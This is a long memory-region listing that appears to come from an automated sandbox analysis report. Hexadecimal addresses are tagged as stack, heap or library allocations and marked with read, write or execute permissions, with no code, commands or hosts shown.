page read and write
|
||
|
79BF39000
|
stack
|
page read and write
|
||
|
12FDD6C3000
|
heap
|
page read and write
|
||
|
2CAF000
|
stack
|
page read and write
|
||
|
12FC34FE000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
24FCD0E0000
|
heap
|
page read and write
|
||
|
24FB47E0000
|
trusted library allocation
|
page read and write
|
||
|
21E247C5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CD6000
|
trusted library allocation
|
page read and write
|
||
|
21E2489D000
|
trusted library allocation
|
page read and write
|
||
|
1C40C1E1000
|
heap
|
page read and write
|
||
|
12FC667D000
|
trusted library allocation
|
page read and write
|
||
|
164B1E3000
|
stack
|
page read and write
|
||
|
12FDD573000
|
heap
|
page read and write
|
||
|
F96F47E000
|
stack
|
page read and write
|
||
|
21E24602000
|
trusted library allocation
|
page read and write
|
||
|
12FC6A31000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D7A000
|
heap
|
page read and write
|
||
|
15036FA4000
|
trusted library allocation
|
page read and write
|
||
|
1C718151000
|
trusted library allocation
|
page read and write
|
||
|
1C40DB10000
|
trusted library allocation
|
page read and write
|
||
|
1C40C1C7000
|
heap
|
page read and write
|
||
|
7FF848CF6000
|
trusted library allocation
|
page read and write
|
||
|
79CC0E000
|
stack
|
page read and write
|
||
|
1C7160E8000
|
heap
|
page read and write
|
||
|
79CC87000
|
stack
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
24CE3EAE000
|
heap
|
page read and write
|
||
|
24FB4790000
|
trusted library allocation
|
page read and write
|
||
|
1C40C20B000
|
heap
|
page read and write
|
||
|
24CE6011000
|
heap
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
1C40E15C000
|
heap
|
page read and write
|
||
|
7C505FF000
|
stack
|
page read and write
|
||
|
21E24743000
|
trusted library allocation
|
page read and write
|
||
|
21E246F9000
|
trusted library allocation
|
page read and write
|
||
|
150343DB000
|
heap
|
page read and write
|
||
|
260B00F7000
|
heap
|
page read and write
|
||
|
24CE5B8E000
|
heap
|
page read and write
|
||
|
21E248CF000
|
trusted library allocation
|
page read and write
|
||
|
15035D8F000
|
heap
|
page read and write
|
||
|
15037860000
|
trusted library allocation
|
page read and write
|
||
|
21E23D30000
|
trusted library allocation
|
page read and write
|
||
|
21E245D6000
|
trusted library allocation
|
page read and write
|
||
|
305F000
|
stack
|
page read and write
|
||
|
7C508FD000
|
stack
|
page read and write
|
||
|
21E24819000
|
trusted library allocation
|
page read and write
|
||
|
90BD5FE000
|
stack
|
page read and write
|
||
|
21E21C31000
|
heap
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
24CE5D30000
|
heap
|
page read and write
|
||
|
1C40C20E000
|
heap
|
page read and write
|
||
|
15035D70000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
21E3BF57000
|
heap
|
page read and write
|
||
|
7FF848C5B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
286CF88F000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D7A000
|
heap
|
page read and write
|
||
|
79C1BE000
|
stack
|
page read and write
|
||
|
24CE3E88000
|
heap
|
page read and write
|
||
|
1C7183BF000
|
trusted library allocation
|
page read and write
|
||
|
260CA187000
|
heap
|
page execute and read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
90BDB7E000
|
stack
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
A29BAFF000
|
stack
|
page read and write
|
||
|
260B00AD000
|
heap
|
page read and write
|
||
|
436A000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
24CE3DC9000
|
heap
|
page read and write
|
||
|
7FF848D36000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FC351F000
|
heap
|
page read and write
|
||
|
1C716365000
|
heap
|
page read and write
|
||
|
260B1BA7000
|
trusted library allocation
|
page read and write
|
||
|
21E2483C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
|
24FCCD9D000
|
heap
|
page read and write
|
||
|
1504E7FE000
|
heap
|
page read and write
|
||
|
21E248B2000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
10EF000
|
stack
|
page read and write
|
||
|
1C40E1F0000
|
heap
|
page execute and read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
286BFB06000
|
trusted library allocation
|
page read and write
|
||
|
260B19E0000
|
heap
|
page read and write
|
||
|
15045F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D16000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB47A0000
|
heap
|
page read and write
|
||
|
24CE5D85000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
24FB5944000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C7B000
|
trusted library allocation
|
page read and write
|
||
|
12FC5357000
|
trusted library allocation
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
286D7960000
|
heap
|
page read and write
|
||
|
15035EA0000
|
heap
|
page execute and read and write
|
||
|
1C426240000
|
heap
|
page read and write
|
||
|
12CE000
|
stack
|
page read and write
|
||
|
90BDBFC000
|
stack
|
page read and write
|
||
|
12FD53B2000
|
trusted library allocation
|
page read and write
|
||
|
21E23F84000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
286D7950000
|
heap
|
page execute and read and write
|
||
|
BF2258E000
|
stack
|
page read and write
|
||
|
21E246D2000
|
trusted library allocation
|
page read and write
|
||
|
2ECB000
|
stack
|
page read and write
|
||
|
A29C03E000
|
stack
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
24FB5BE6000
|
trusted library allocation
|
page read and write
|
||
|
BF217BE000
|
stack
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
2F0C000
|
stack
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
24CE5BA2000
|
heap
|
page read and write
|
||
|
15035C40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
24FB552B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E2473F000
|
trusted library allocation
|
page read and write
|
||
|
12FC54A1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F94000
|
trusted library allocation
|
page read and write
|
||
|
12FC5559000
|
trusted library allocation
|
page read and write
|
||
|
260AFF70000
|
heap
|
page read and write
|
||
|
12FC69EC000
|
trusted library allocation
|
page read and write
|
||
|
1504E71B000
|
heap
|
page read and write
|
||
|
24FCD160000
|
heap
|
page read and write
|
||
|
90BD67E000
|
stack
|
page read and write
|
||
|
15035D00000
|
heap
|
page execute and read and write
|
||
|
21E3BEE0000
|
heap
|
page execute and read and write
|
||
|
24FCD163000
|
heap
|
page read and write
|
||
|
21E21C94000
|
heap
|
page read and write
|
||
|
7FF848D16000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
150E000
|
stack
|
page read and write
|
||
|
24FCCD66000
|
heap
|
page read and write
|
||
|
24CE3DF1000
|
heap
|
page read and write
|
||
|
260CA298000
|
heap
|
page read and write
|
||
|
24CE5D40000
|
heap
|
page read and write
|
||
|
1C40ECF2000
|
trusted library allocation
|
page read and write
|
||
|
CE7A5E3000
|
stack
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
48A2CCD000
|
stack
|
page read and write
|
||
|
A29BF36000
|
stack
|
page read and write
|
||
|
90C000
|
stack
|
page read and write
|
||
|
15037693000
|
trusted library allocation
|
page read and write
|
||
|
164B5FD000
|
stack
|
page read and write
|
||
|
24FB2E78000
|
heap
|
page read and write
|
||
|
12FDD73A000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
1C40E11A000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848C5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
260B0350000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
1C715FA0000
|
heap
|
page read and write
|
||
|
18832C30000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
322F000
|
stack
|
page read and write
|
||
|
7DF4438F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F9703CC000
|
stack
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
1C73017A000
|
heap
|
page read and write
|
||
|
24FCD3D0000
|
heap
|
page read and write
|
||
|
24FCD08F000
|
heap
|
page read and write
|
||
|
7FF848C6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FC3310000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
BF219BE000
|
stack
|
page read and write
|
||
|
286BF89C000
|
trusted library allocation
|
page read and write
|
||
|
BF214FE000
|
stack
|
page read and write
|
||
|
12FC3440000
|
heap
|
page read and write
|
||
|
1C7301A4000
|
heap
|
page read and write
|
||
|
7FF848E32000
|
trusted library allocation
|
page read and write
|
||
|
1C41E221000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DC000
|
stack
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
7FF848C54000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F52000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
12FC66C5000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D1F000
|
heap
|
page read and write
|
||
|
21E24465000
|
trusted library allocation
|
page read and write
|
||
|
21E2489B000
|
trusted library allocation
|
page read and write
|
||
|
1C40C1C9000
|
heap
|
page read and write
|
||
|
1C40DA54000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
21E246F6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
12FD5335000
|
trusted library allocation
|
page read and write
|
||
|
F96F4F8000
|
stack
|
page read and write
|
||
|
21E23CAD000
|
trusted library allocation
|
page read and write
|
||
|
150461FF000
|
trusted library allocation
|
page read and write
|
||
|
164BC3B000
|
stack
|
page read and write
|
||
|
150370E9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
BF218B9000
|
stack
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
12FC6C70000
|
trusted library allocation
|
page read and write
|
||
|
79B7E2000
|
stack
|
page read and write
|
||
|
3EAF000
|
stack
|
page read and write
|
||
|
2D0C000
|
heap
|
page read and write
|
||
|
15045F41000
|
trusted library allocation
|
page read and write
|
||
|
260CA056000
|
heap
|
page read and write
|
||
|
286BFD88000
|
trusted library allocation
|
page read and write
|
||
|
286BF070000
|
heap
|
page read and write
|
||
|
24FB58A8000
|
trusted library allocation
|
page read and write
|
||
|
A29BBFD000
|
stack
|
page read and write
|
||
|
12FC6BAA000
|
trusted library allocation
|
page read and write
|
||
|
24FB5970000
|
trusted library allocation
|
page read and write
|
||
|
1C716360000
|
heap
|
page read and write
|
||
|
1C40E0E8000
|
heap
|
page read and write
|
||
|
21E23C8F000
|
trusted library allocation
|
page read and write
|
||
|
21E2472B000
|
trusted library allocation
|
page read and write
|
||
|
12FDCF51000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
24CE5E10000
|
heap
|
page read and write
|
||
|
24CE5D9E000
|
heap
|
page read and write
|
||
|
1C40D9E0000
|
heap
|
page read and write
|
||
|
24CE5D21000
|
heap
|
page read and write
|
||
|
1C71618A000
|
heap
|
page read and write
|
||
|
1C718C23000
|
trusted library allocation
|
page read and write
|
||
|
24FC4DC4000
|
trusted library allocation
|
page read and write
|
||
|
15037CEC000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
|
48A1AFE000
|
stack
|
page read and write
|
||
|
1504E2C2000
|
heap
|
page read and write
|
||
|
1C716198000
|
heap
|
page read and write
|
||
|
150363DD000
|
trusted library allocation
|
page read and write
|
||
|
21E23D29000
|
trusted library allocation
|
page read and write
|
||
|
150342B0000
|
heap
|
page read and write
|
||
|
10001000
|
direct allocation
|
page execute and read and write
|
||
|
2D3A000
|
heap
|
page read and write
|
||
|
164B67E000
|
stack
|
page read and write
|
||
|
210306B0000
|
heap
|
page read and write
|
||
|
CE7B03E000
|
stack
|
page read and write
|
||
|
24FB5C47000
|
trusted library allocation
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
15034332000
|
heap
|
page read and write
|
||
|
24FB2EF0000
|
heap
|
page read and write
|
||
|
24FCCD37000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
12FC4E50000
|
trusted library allocation
|
page read and write
|
||
|
286D77A4000
|
heap
|
page read and write
|
||
|
CE7A8BF000
|
unkown
|
page read and write
|
||
|
260B0077000
|
heap
|
page read and write
|
||
|
21E23F7C000
|
trusted library allocation
|
page read and write
|
||
|
21E24688000
|
trusted library allocation
|
page read and write
|
||
|
3AAF000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
1C40E070000
|
heap
|
page read and write
|
||
|
24CE5BDA000
|
heap
|
page read and write
|
||
|
24CE5D7A000
|
heap
|
page read and write
|
||
|
D48000
|
heap
|
page read and write
|
||
|
286BFB17000
|
trusted library allocation
|
page read and write
|
||
|
10016000
|
direct allocation
|
page execute and read and write
|
||
|
12FDD5C0000
|
heap
|
page read and write
|
||
|
A29BE79000
|
stack
|
page read and write
|
||
|
2D0E000
|
heap
|
page read and write
|
||
|
286BF075000
|
heap
|
page read and write
|
||
|
1C716194000
|
heap
|
page read and write
|
||
|
21E2477E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E44000
|
trusted library allocation
|
page read and write
|
||
|
3FFB000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
1C718668000
|
trusted library allocation
|
page read and write
|
||
|
12FD5593000
|
trusted library allocation
|
page read and write
|
||
|
1C728150000
|
trusted library allocation
|
page read and write
|
||
|
48A1A7D000
|
stack
|
page read and write
|
||
|
24FB2F70000
|
heap
|
page read and write
|
||
|
24FB2F60000
|
heap
|
page read and write
|
||
|
260B1B54000
|
heap
|
page read and write
|
||
|
1C7185F5000
|
trusted library allocation
|
page read and write
|
||
|
188329C0000
|
heap
|
page read and write
|
||
|
24FCD06D000
|
heap
|
page read and write
|
||
|
12FC4DE0000
|
heap
|
page read and write
|
||
|
260B00AB000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
286D7851000
|
heap
|
page read and write
|
||
|
7FF848C33000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C7160E0000
|
heap
|
page read and write
|
||
|
15035D74000
|
heap
|
page read and write
|
||
|
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
|
7DA000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
|
3AED000
|
stack
|
page read and write
|
||
|
21E247EC000
|
trusted library allocation
|
page read and write
|
||
|
1C40E0A5000
|
heap
|
page read and write
|
||
|
12FC4F40000
|
heap
|
page execute and read and write
|
||
|
15A0000
|
heap
|
page read and write
|
||
|
12FC35A8000
|
heap
|
page read and write
|
||
|
21E24868000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
|
12F0000
|
heap
|
page read and write
|
||
|
286BD638000
|
heap
|
page read and write
|
||
|
15037217000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D23000
|
heap
|
page read and write
|
||
|
1503432E000
|
heap
|
page read and write
|
||
|
260CA063000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
1C718153000
|
trusted library allocation
|
page read and write
|
||
|
1504E6F9000
|
heap
|
page read and write
|
||
|
286D7980000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
260B1C7F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
|
79BA7E000
|
unkown
|
page read and write
|
||
|
21E3BDB3000
|
heap
|
page read and write
|
||
|
21E21C4D000
|
heap
|
page read and write
|
||
|
79C13C000
|
stack
|
page read and write
|
||
|
286BD6E6000
|
heap
|
page read and write
|
||
|
15036F15000
|
trusted library allocation
|
page read and write
|
||
|
12FC5567000
|
trusted library allocation
|
page read and write
|
||
|
21E24847000
|
trusted library allocation
|
page read and write
|
||
|
21E21CBB000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
260B1BBD000
|
trusted library allocation
|
page read and write
|
||
|
90BD1A2000
|
stack
|
page read and write
|
||
|
21E23FFF000
|
trusted library allocation
|
page read and write
|
||
|
F96F8FB000
|
stack
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
34DF000
|
stack
|
page read and write
|
||
|
260B1B87000
|
trusted library allocation
|
page read and write
|
||
|
286C0176000
|
trusted library allocation
|
page read and write
|
||
|
21E247B9000
|
trusted library allocation
|
page read and write
|
||
|
1C7160A0000
|
heap
|
page read and write
|
||
|
BF211CE000
|
stack
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1504E6A0000
|
heap
|
page read and write
|
||
|
21E24668000
|
trusted library allocation
|
page read and write
|
||
|
24FCCDCE000
|
heap
|
page read and write
|
||
|
64F64FD000
|
stack
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
1C7181C2000
|
trusted library allocation
|
page read and write
|
||
|
1C717B50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
79BD7E000
|
stack
|
page read and write
|
||
|
24CE5F67000
|
heap
|
page read and write
|
||
|
7FF848CDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
164B57E000
|
stack
|
page read and write
|
||
|
24FB6764000
|
trusted library allocation
|
page read and write
|
||
|
F97044E000
|
stack
|
page read and write
|
||
|
79BBF9000
|
stack
|
page read and write
|
||
|
1C40EAF2000
|
trusted library allocation
|
page read and write
|
||
|
12FDD6F3000
|
heap
|
page read and write
|
||
|
21E247CB000
|
trusted library allocation
|
page read and write
|
||
|
21E2404C000
|
trusted library allocation
|
page read and write
|
||
|
24CE5AF1000
|
heap
|
page read and write
|
||
|
7C503FE000
|
stack
|
page read and write
|
||
|
260B1C75000
|
trusted library allocation
|
page read and write
|
||
|
12FDD6B9000
|
heap
|
page read and write
|
||
|
286BFB9E000
|
trusted library allocation
|
page read and write
|
||
|
21E24724000
|
trusted library allocation
|
page read and write
|
||
|
12FC69D9000
|
trusted library allocation
|
page read and write
|
||
|
12FDD4A0000
|
heap
|
page read and write
|
||
|
210306C0000
|
heap
|
page read and write
|
||
|
21E33BF0000
|
trusted library allocation
|
page read and write
|
||
|
15035C20000
|
trusted library allocation
|
page read and write
|
||
|
48A1BFE000
|
stack
|
page read and write
|
||
|
24CE5D43000
|
heap
|
page read and write
|
||
|
39AE000
|
stack
|
page read and write
|
||
|
24FB5AA3000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
286D7816000
|
heap
|
page read and write
|
||
|
12FC4F20000
|
heap
|
page read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
7FF848C6B000
|
trusted library allocation
|
page read and write
|
||
|
21E2477A000
|
trusted library allocation
|
page read and write
|
||
|
1C40E6FF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
1C40DB50000
|
trusted library allocation
|
page read and write
|
||
|
260B00F5000
|
heap
|
page read and write
|
||
|
21E21E30000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C44000
|
trusted library allocation
|
page read and write
|
||
|
260B1BE4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
24CE6011000
|
heap
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page read and write
|
||
|
1C7281BE000
|
trusted library allocation
|
page read and write
|
||
|
24CE5AF2000
|
heap
|
page read and write
|
||
|
90BD57F000
|
stack
|
page read and write
|
||
|
286BD6F4000
|
heap
|
page read and write
|
||
|
1C40E101000
|
heap
|
page read and write
|
||
|
286CF681000
|
trusted library allocation
|
page read and write
|
||
|
286BF630000
|
heap
|
page execute and read and write
|
||
|
12FDD715000
|
heap
|
page read and write
|
||
|
21E2434A000
|
trusted library allocation
|
page read and write
|
||
|
164B6FE000
|
stack
|
page read and write
|
||
|
15036EF1000
|
trusted library allocation
|
page read and write
|
||
|
1C718C2B000
|
trusted library allocation
|
page read and write
|
||
|
CE7AF3E000
|
stack
|
page read and write
|
||
|
CE7A93F000
|
stack
|
page read and write
|
||
|
24FCCFF0000
|
heap
|
page read and write
|
||
|
1347000
|
heap
|
page read and write
|
||
|
260B0354000
|
heap
|
page read and write
|
||
|
7FF848C54000
|
trusted library allocation
|
page read and write
|
||
|
3D2F000
|
stack
|
page read and write
|
||
|
21E3BD50000
|
heap
|
page execute and read and write
|
||
|
24FB4930000
|
heap
|
page execute and read and write
|
||
|
1C730227000
|
heap
|
page read and write
|
||
|
24FC4941000
|
trusted library allocation
|
page read and write
|
||
|
1504E450000
|
heap
|
page read and write
|
||
|
21E24840000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
24FB59D5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E35000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
24FB2E2F000
|
heap
|
page read and write
|
||
|
1C7161A8000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
90BE68D000
|
stack
|
page read and write
|
||
|
1504E731000
|
heap
|
page read and write
|
||
|
7FF848E01000
|
trusted library allocation
|
page read and write
|
||
|
1C718141000
|
trusted library allocation
|
page read and write
|
||
|
21E21D30000
|
heap
|
page read and write
|
||
|
24CE5D1B000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
A29B7F5000
|
stack
|
page read and write
|
||
|
21E236BA000
|
heap
|
page read and write
|
||
|
24FCCE10000
|
heap
|
page execute and read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
13CF000
|
stack
|
page read and write
|
||
|
79CD8B000
|
stack
|
page read and write
|
||
|
21E247E8000
|
trusted library allocation
|
page read and write
|
||
|
21E21C5A000
|
heap
|
page read and write
|
||
|
15035EF0000
|
trusted library allocation
|
page read and write
|
||
|
BF21B3E000
|
stack
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
12FC66FB000
|
trusted library allocation
|
page read and write
|
||
|
24FB5C7B000
|
trusted library allocation
|
page read and write
|
||
|
24FB4750000
|
trusted library allocation
|
page read and write
|
||
|
90BD6FB000
|
stack
|
page read and write
|
||
|
24FC4971000
|
trusted library allocation
|
page read and write
|
||
|
21E24123000
|
trusted library allocation
|
page read and write
|
||
|
21E33C51000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C64000
|
trusted library allocation
|
page read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
21E2416A000
|
trusted library allocation
|
page read and write
|
||
|
260B2045000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B52000
|
heap
|
page read and write
|
||
|
18832A47000
|
heap
|
page read and write
|
||
|
7FF848FB4000
|
trusted library allocation
|
page read and write
|
||
|
7C509FE000
|
stack
|
page read and write
|
||
|
7FF848D36000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FC693F000
|
trusted library allocation
|
page read and write
|
||
|
12FD4FC1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
286BFB00000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFA000
|
trusted library allocation
|
page read and write
|
||
|
3BEE000
|
stack
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
260B1C88000
|
trusted library allocation
|
page read and write
|
||
|
1504E6C7000
|
heap
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E42000
|
trusted library allocation
|
page read and write
|
||
|
12FC5531000
|
trusted library allocation
|
page read and write
|
||
|
260B1B50000
|
heap
|
page read and write
|
||
|
7FF848C54000
|
trusted library allocation
|
page read and write
|
||
|
1C717CA0000
|
heap
|
page read and write
|
||
|
286BFB25000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
F96EEB3000
|
stack
|
page read and write
|
||
|
12FC4FCF000
|
trusted library allocation
|
page read and write
|
||
|
21E23D76000
|
trusted library allocation
|
page read and write
|
||
|
164C60E000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
24CE3E00000
|
heap
|
page read and write
|
||
|
24CE5D6C000
|
heap
|
page read and write
|
||
|
7FF848FAC000
|
trusted library allocation
|
page read and write
|
||
|
24FB2D10000
|
heap
|
page read and write
|
||
|
24CE5D8B000
|
heap
|
page read and write
|
||
|
12FC535B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
1189000
|
stack
|
page read and write
|
||
|
260B2096000
|
trusted library allocation
|
page read and write
|
||
|
1C728169000
|
trusted library allocation
|
page read and write
|
||
|
286BF4B0000
|
trusted library allocation
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
260CA1B0000
|
heap
|
page read and write
|
||
|
7DF4EC8E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
315F000
|
stack
|
page read and write
|
||
|
7FF848DD1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
3EFD000
|
stack
|
page read and write
|
||
|
24CE5D1A000
|
heap
|
page read and write
|
||
|
F0C000
|
stack
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
1206000
|
heap
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
1C40E943000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E28000
|
trusted library allocation
|
page read and write
|
||
|
21E21C7A000
|
heap
|
page read and write
|
||
|
21E237EB000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
15037D31000
|
trusted library allocation
|
page read and write
|
||
|
1C718C27000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D26000
|
trusted library allocation
|
page execute and read and write
|
||
|
90BD77E000
|
stack
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CE3DC0000
|
heap
|
page read and write
|
||
|
1C40E6B8000
|
trusted library allocation
|
page read and write
|
||
|
1C40E1F7000
|
heap
|
page execute and read and write
|
||
|
286BD6EE000
|
heap
|
page read and write
|
||
|
1C41E2BD000
|
trusted library allocation
|
page read and write
|
||
|
260B016E000
|
heap
|
page read and write
|
||
|
1C42633C000
|
heap
|
page read and write
|
||
|
1C71887C000
|
trusted library allocation
|
page read and write
|
||
|
260B0050000
|
trusted library allocation
|
page read and write
|
||
|
